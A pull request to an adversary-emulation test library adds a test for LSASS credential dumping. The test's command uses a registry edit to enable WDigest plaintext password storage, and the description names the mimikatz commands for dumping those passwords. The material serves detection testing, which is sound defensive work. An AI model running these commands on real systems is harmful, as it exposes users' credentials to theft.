### PR TITLE
Update T1003.001.yaml & add reg key to enable wdigest

### DIFF
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -1,20 +1,12 @@
 attack_technique: T1003.001
 display_name: "OS Credential Dumping: LSASS Memory"
 atomic_tests:
-- name: Wdigest enable
-  auto_generated_guid:
-  descriptions: |
-    Enable Wdigest so you are able to dump clear text passwords from LSASS once workstation locks and user logs back on.
+- name: Wdigest
+  description: Enable Wdigest to allow password to be stored in clear text
   supported_platforms:
   - windows
-  input_arguments:
-    command_to_execute:
-      description:
-      type:
-      default:
-   executor:
-    command: |
-      reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
+  executor:
+    command: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
     cleanup_command: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0
     name: command_prompt
     elevation_required: true

--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -1,6 +1,24 @@
 attack_technique: T1003.001
 display_name: "OS Credential Dumping: LSASS Memory"
 atomic_tests:
+- name: Wdigest enable
+  auto_generated_guid: 04294049-ffdd-4d4f-9bbc-8c3e214166af
+  descriptions: |
+    Enable Wdigest so you are able to dump clear text passwords from LSASS once workstation locks and user logs back on.
+  supported_platforms:
+  - windows
+  input_arguments:
+    command_to_execute:
+      description:
+      type:
+      default:
+   executor:
+    command: |
+      reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
+    cleanup_command: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0
+    name: command_prompt
+    elevation_required: true
+  
 - name: Windows Credential Editor
   auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
   description: |

--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -2,7 +2,7 @@ attack_technique: T1003.001
 display_name: "OS Credential Dumping: LSASS Memory"
 atomic_tests:
 - name: Wdigest enable
-  auto_generated_guid: 04294049-ffdd-4d4f-9bbc-8c3e214166af
+  auto_generated_guid:
   descriptions: |
     Enable Wdigest so you are able to dump clear text passwords from LSASS once workstation locks and user logs back on.
   supported_platforms:


### PR DESCRIPTION
Please be kind; I've never done a pull request on this.
I propose Enable Wdigest to allow the passwords to be saved in memory in clear text.
Not sure if this goes here or should be a more complex Atomic test where we add the reg key then gpupdate /force (lockscreen/login) and then dump passwords from lsass using mimikatz

privilege::debug
sekurlsa::wdigest

Or something like Invoke-WdigestDowngrade.ps1 from HarmJ0y & then mimikatz

maybe just having the reg key is enough to spark the conversation that this is a symptom of an intrusion that will potentially end in clear text credential access?

**Details:**
<!-- Insert details about this change here. Please include as much detail as possible -->

**Testing:**
<!-- Note any testing done, local or automated here. -->

**Associated Issues:**
<!-- Please link any issues that this pull request impacts or fixes. -->